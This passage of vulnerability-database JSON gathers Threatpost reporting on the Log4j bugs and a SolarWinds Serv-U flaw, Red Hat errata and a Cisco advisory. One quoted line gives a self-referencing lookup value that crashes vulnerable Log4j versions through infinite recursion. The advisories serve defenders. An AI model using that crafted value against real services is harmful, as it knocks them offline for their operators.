"modified": "2022-01-04T22:49:54", "id": "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "href": "https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T16:11:34", "description": "No, you\u2019re not seeing triple: On Friday, Apache released yet another patch \u2013 [version 2.17](<https://logging.apache.org/log4j/2.x/download.html>) \u2013 for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.\n\nTrouble comes in threes, and this is the third one for log4j. 
The latest bug isn\u2019t a variant of the Log4Shell remote-code execution (RCE) bug that\u2019s plagued IT teams since Dec. 10, coming [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) [worldwide](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) within hours of its public disclosure, spawning [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and leading to the [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch.\n\nIt does have similarities, though: The new bug affects the same component as the Log4Shell bug. Both the Log4Shell, tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (criticality rating of CVSS 10.0) and the new bug, tracked as [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) abuse attacker-controlled lookups in logged data.\n\nThe difference: The lookups in the new bug, CVE-2021-45105, are Context Map lookups instead of the Java Naming and Directory Interface (JNDI) lookups to an LDAP server that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nContextMapLookup allows applications to store data in the Log4j ThreadContext Map and then retrieve the values in the Log4j configuration: For example, an app would store the current user\u2019s login id in the ThreadContext Map with the key \u201cloginId\u201d.\n\nThe weakness has to do with improper input validation and uncontrolled recursion that can lead to DoS.\n\nAs [explained](<https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor>) by Guy Lederfein of the Trend Micro Research Team, \u201cthe Apache Log4j API supports variable substitution in lookups. 
However, a crafted variable can cause the application to crash due to uncontrolled recursive substitutions. An attacker with control over lookup commands (e.g., via the Thread Context Map) can craft a malicious lookup variable, which results in a Denial-of-Service (DoS) attack.\u201d\n\nThe new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, which Apache shipped last week to remediate the [second flaw](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>) in the trio. That second bug was the RCE flaw [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), which, in turn, stemmed from Apache\u2019s [incomplete fix](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) for [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), aka the Log4Shell vulnerability.\n\nLederfein continued: \u201cWhen a nested variable is substituted by the StrSubstitutor class, it recursively calls the substitute() class. However, when the nested variable references the variable being replaced, the recursion is called with the same string. This leads to an infinite recursion and a DoS condition on the server. As an example, if the Pattern Layout contains a Context Lookup of ${ctx.apiversion}, and its assigned value is ${${ctx.apiversion}}, the variable will be recursively substituted with itself.\u201d\n\nThe vulnerability has been tested and confirmed on Log4j versions up to and including 2.16, he said.\n\nApache has listed mitigating factors, but ZDI recommends upgrading to the latest version to ensure that the bug is completely addressed.\n\nThe latest bug and Apache\u2019s new round of fixes are just the latest news in the ongoing, ever-shifting log4j situation. 
As exploits flood in, new vulnerabilities emerge and patches turn out to need patching, huge tech players [such as SAP](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>) have been hurrying to hunt down the logging library and to release product patches.\n\n## CISA Mandates Immediate Patching\n\nOn Thursday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23.\n\nThe risk presented by the library\u2019s vulnerabilities is sky-high, as multiple threat actors have jumped on the opportunities to exploit vulnerable systems. As Check Point Research (CPR) [highlighted](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) last week, real-life attacks have included a crypto-mining group that launched attacks in five countries.\n\nLast week, Microsoft reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey, are actively exploiting Log4Shell in targeted attacks. 
Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus \u2013 aka [Charming Kitten](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>), APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\nCPR said that Charming Kitten had gone after seven Israeli targets as of Wednesday.\n\n## Conti Ransomware Gang Is Among the Attackers\n\nThe Conti ransomware gang is in on it too: AdvIntel researchers said last week that they\u2019ve seen Conti operators going after VMware vCenter.\n\n\u201cThe current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit,\u201d the researchers [said](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) last week. \u201cThe criminals pursued targeting specific vulnerable [Log4j 2 VMware vCenter](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. and European victim networks from the pre-existent Cobalt Strike sessions.\u201d\n\nLast week, a ransomware attack that some suspect may be attributable to the [Conti gang](<https://threatpost.com/conti-ransomware-backups/175114/>) forced a family-run chain of restaurants, hotels and breweries, [McMenamins](<https://www.mcmenamins.com/>), to [shut down some operations.](<https://threatpost.com/conti-gang-ransomware-attack-mcmenamins/177119/>)\n\nThe bugs are also being leveraged by botnets, remote access trojans (RATs), initial access brokers, and a new ransomware strain called Khonsari. 
As of Monday, CPR said that it\u2019s seen more than 4.3 million attempted exploits, more than 46 percent of which were made by \u201cknown malicious groups.\u201d\n\n## Yet More Sleepless Nights\n\nTrend Micro\u2019s Lederfein noted that the log4j component has had quite a run in the vulnerability spotlight, having received \u201cquite a bit of attention\u201d since the Log4Shell vulnerability was revealed 10 days ago. Expect more of the same, he predicted, as \u201cit would not be a surprise to see further bugs disclosed \u2013 with or without a patch.\u201d\n\nTom Garrubba, CISO with Shared Assessments, concurred: \u201cThis vulnerability has been keeping a lot of security professionals up at night,\u201d he told Threatpost. This Javageddon has even percolated up to the C-suite, he said.\n\n\u201cExecutives and board members are also gaining interest as to how this will affect them as well,\u201d he said via email. \u201cLog4j is used all throughout the Internet and [affects] multiple applications and systems with deep roots.\u201d\n\n\u201cThe best path you can take right now is to stay alert for all patches that are coming out to address this vulnerability and put them into place immediately,\u201d Garrubba advised. 
\u201cSadly, it appears this is going to affect organizations continuously into the future as they identify more items that are affected by this vulnerability.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T16:01:57", "type": "threatpost", "title": "Third Log4J Bug Can Trigger DoS; Apache Issues Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T16:01:57", "id": "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "href": "https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T23:09:28", "description": "Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.\n\nThis is a confusing story: Initially, Microsoft had warned 
on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks\u2019 internal devices via the SolarWinds bug.\n\nSolarWinds had issued a fix the day before, on Tuesday.\n\nSolarWinds subsequently reached out to Threatpost and other news outlets on Thursday to clarify that Microsoft\u2019s report referred to a threat actor attempting to log in to Serv-U using the Log4j vulnerability. The attempt failed, given that Serv-U doesn\u2019t use Log4j code and the target for authentication \u2013 LDAP (Microsoft Active Directory) \u2013 isn\u2019t susceptible to Log4j attacks.\n\nThe SolarWinds vulnerability, tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation flaw that could allow attackers to build a query, given some input, and to send that query over the network without sanitization, Microsoft\u2019s Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#CVE-2021-35247>).\n\nThe bug, discovered by Microsoft\u2019s Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior. 
SolarWinds fixed the vulnerability in Serv-U version 15.3, [released](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>) on Tuesday.\n\n\u201cThe Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized,\u201d SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>) in its advisory, adding that it had updated the input mechanism \u201cto perform additional validation and sanitization.\u201d\n\nMicrosoft security researcher Jonathan Bar Or, credited with discovering the bug, explained that he had seen attacks coming from serv-u.exe while hunting for log4j exploit attempts. \u201cTaking a closer look revealed you could feed Serv-U with data and it\u2019ll build an LDAP query with your unsanitized input!\u201d he [said](<https://twitter.com/yo_yo_yo_jbo/status/1483951175997149184>). \u201cThis could be used for log4j attack attempts, but also for LDAP injection.\u201d\n\nA SolarWinds representative told Threatpost that the attacker wasn\u2019t able to log in to Serv-U, and that the Microsoft researcher was referencing attempted logins that failed, since Serv-U doesn\u2019t leverage Log4J code.\n\nSolarWinds said that it hasn\u2019t seen any \u201cdownstream [effect]\u201d of the bug, given that \u201cthe LDAP servers ignored improper characters.\u201d\n\nFor its part, MSTIC didn\u2019t give details about the attack it observed.\n\n## Just the Latest in Ongoing Log4j Barrage\n\nThe Serv-U attacks are just the latest in the rampant Log4j exploit attempts and testing that have been [thrown at](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the multiple flaws in Apache\u2019s [Log4j logging library](<https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/>) since those flaws were [disclosed](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) \u2013 and came under 
near-immediate attack \u2013 last month.\n\nOn Tuesday, Akamai researchers also [reported](<https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability>) that they\u2019ve detected evidence of the unauthenticated remote code execution (RCE) vulnerability in Log4j \u2013 tracked as CVE-2021-44228 \u2013 being adapted to infect and assist in the proliferation of malware used by the [Mirai](<https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/>) botnet by targeting [Zyxel networking devices](<https://www.zyxel.com/us/en/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml>).\n\nMSTIC strongly recommended that affected customers apply the SolarWinds security updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:39:21", "type": "threatpost", "title": "Microsoft: Attackers Tried to Login to SolarWinds Serv-U Via Log4j Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35247", "CVE-2021-44228"], "modified": "2022-01-20T18:39:21", "id": "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "href": 
"https://threatpost.com/microsoft-log4j-attackssolarwinds-serv-u-bug/177824/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2023-05-25T12:20:40", "description": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.3 in the Release Notes [3].\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T11:36:05", "type": "redhat", "title": "(RHSA-2022:0205) Moderate: Red Hat Data Grid 8.2.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T11:36:29", "id": "RHSA-2022:0205", "href": "https://access.redhat.com/errata/RHSA-2022:0205", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "This release of Red Hat build of Eclipse Vert.x 4.1.8 GA includes security updates. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T12:09:30", "type": "redhat", "title": "(RHSA-2022:0083) Moderate: Red Hat build of Eclipse Vert.x 4.1.8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T12:09:40", "id": "RHSA-2022:0083", "href": "https://access.redhat.com/errata/RHSA-2022:0083", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T09:22:41", "type": "redhat", "title": "(RHSA-2022:0203) Critical: Red Hat Fuse 7.8-7.10 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T09:23:05", "id": "RHSA-2022:0203", "href": "https://access.redhat.com/errata/RHSA-2022:0203", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:50:57", "type": "redhat", "title": "(RHSA-2022:0222) Moderate: Red Hat Integration Camel Extensions for Quarkus 2.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:51:20", "id": "RHSA-2022:0222", "href": "https://access.redhat.com/errata/RHSA-2022:0222", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "A minor version update (from 1.6.2 to 1.6.3) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related 
information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:51:49", "type": "redhat", "title": "(RHSA-2022:0223) Moderate: Red Hat Integration Camel-K 1.6.3 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:52:01", "id": "RHSA-2022:0223", "href": "https://access.redhat.com/errata/RHSA-2022:0223", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.\n\nThis asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in 
log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T15:56:27", "type": "redhat", "title": "(RHSA-2022:0216) Low: Red Hat JBoss Enterprise Application Platform 7.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T15:56:55", "id": "RHSA-2022:0216", "href": "https://access.redhat.com/errata/RHSA-2022:0216", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2023-05-23T16:22:55", "description": "Critical Vulnerabilities in Apache Log4j Java Logging Library\n\nOn December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was 
disclosed:\n\nCVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints\n\nOn December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:\n\nCVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack\n\nOn December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:\n\nCVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation\n\nOn December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was disclosed:\n\nCVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration\n\nFor a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities [\"https://logging.apache.org/log4j/2.x/security.html\"] page.\n\nCisco's Response to These Vulnerabilities\n\nCisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. 
To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21 [\"https://www.snort.org/advisories/talos-rules-2021-12-21\"]\n\nProduct fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.\n\nCisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities.\n\nCisco's standard practice is to update integrated third-party software components to later versions as they become available.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\"]", "cvss3": {}, "published": "2021-12-10T18:45:00", "type": "cisco", "title": "Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-31T21:16:10", "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", "cvss": {"score": 6.6, "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"}}], "githubexploit": [{"lastseen": "2022-03-31T08:13:42", "description": 